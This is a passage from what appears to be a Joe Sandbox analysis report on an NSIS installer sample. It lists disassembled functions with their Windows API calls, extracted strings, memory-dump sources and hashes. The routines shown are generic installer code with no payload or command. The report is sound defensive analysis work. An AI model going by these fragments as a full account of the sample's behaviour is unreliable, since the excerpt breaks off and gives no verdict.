MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Function 00403082 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNEL32(00000040,?), ref: 00403231

Strings

Null, xrefs: 00403179
Error launching installer, xrefs: 004030D2
Inst, xrefs: 00403167
soft, xrefs: 00403170
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-527102705
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 0040675E
lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004067B8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Function 004032B9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

A, xrefs: 00403379
A, xrefs: 00403483
... %d%%, xrefs: 00403400
*B, xrefs: 004032E4

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%
API String ID: 551687249-3485722521
Opcode ID: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,74DF23A0), ref: 00405637
SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(?,00000064,?), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Function 00406805 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Function 00401774 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

